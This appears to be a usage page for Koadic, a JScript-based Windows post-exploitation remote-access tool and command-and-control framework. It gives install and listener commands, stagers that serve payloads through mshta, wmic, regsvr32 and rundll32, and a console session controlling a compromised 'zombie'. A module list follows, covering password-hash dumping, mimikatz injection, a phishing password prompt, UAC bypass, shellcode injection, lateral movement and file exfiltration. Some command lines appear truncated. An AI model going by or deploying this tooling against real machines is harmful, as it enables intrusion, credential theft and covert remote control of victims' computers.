Koadic C3 COM Command & Control - JScript RAT

Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.


git clone https://github.com/zerosum0x0/koadic
git submodule init
git submodule update
pip2.7 install -r requirements.txt --user
python2.7 koadic

Set a listener

use stager/js/mshta
set SRVPORT 4444

[>] mshta
use stager/js/wmic
set SRVPORT 4444

[>] wmic os get /FORMAT:""


Stagers hook target zombies and allow you to use implants.

Module Description
stager/js/mshta serves payloads using MSHTA.exe HTML Applications
stager/js/regsvr serves payloads using regsvr32.exe COM+ scriptlets
stager/js/wmic serves payloads using WMIC XSL
stager/js/rundll32_js serves payloads using rundll32.exe
stager/js/disk serves payloads using files on disk

List zombies and interact with them

(koadic: sta/js/wmic)$ zombies

        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0    Alive   2018-10-04 17:07:12

(koadic: sta/js/wmic)$ zombies 0
        ID:                     0
        Status:                 Alive
        First Seen:             2018-10-04 17:05:00
        Last Seen:              2018-10-04 17:14:42
        User:                   DESKTOP-68URA9U\CrashWin
        Elevated:               No

Interact with zombies zombie_id, get a shell with cmdshell zombie_id.

[koadic: ZOMBIE 0 ( - C:\Users\CrashWin]> whoami
[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
Result for `cd C:\Users\CrashWin & whoami`:

Use an implant

Select an implant with use module, then fill the info with set INFO value, finally start the module with run.

(koadic: sta/js/mshta)$ use implant/phish/password_box
(koadic: imp/phi/password_box)$ set ZOMBIE 1
(koadic: imp/phi/password_box)$ run
Input contents:


Implants start jobs on zombies.

Module Description
implant/elevate/bypassuac_eventvwr Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/voice Plays a message over text-to-speech.
implant/gather/clipboard Retrieves the current content of the user clipboard.
implant/gather/enum_domain_info Retrieve information about the Windows domain.
implant/gather/hashdump_sam Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc Domain controller hashes from the NTDS.dit file.
implant/gather/user_hunter Locate users logged on to domain computers (using Dynamic Wrapper X).
implant/inject/mimikatz_dynwrapx Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop Enables remote desktop on the target.
implant/manage/exec_cmd Run an arbitrary command on the target, and optionally receive the output.
implant/phishing/password_box Prompt a user to enter their password.
implant/pivot/stage_wmi Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec Run a command on another machine using psexec from sysinternals.
implant/scan/tcp Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file Downloads a file from the target zombie.
implant/utils/multi_module Run a number of implants in succession.
implant/utils/upload_file Uploads a file from the listening server to the target zombies.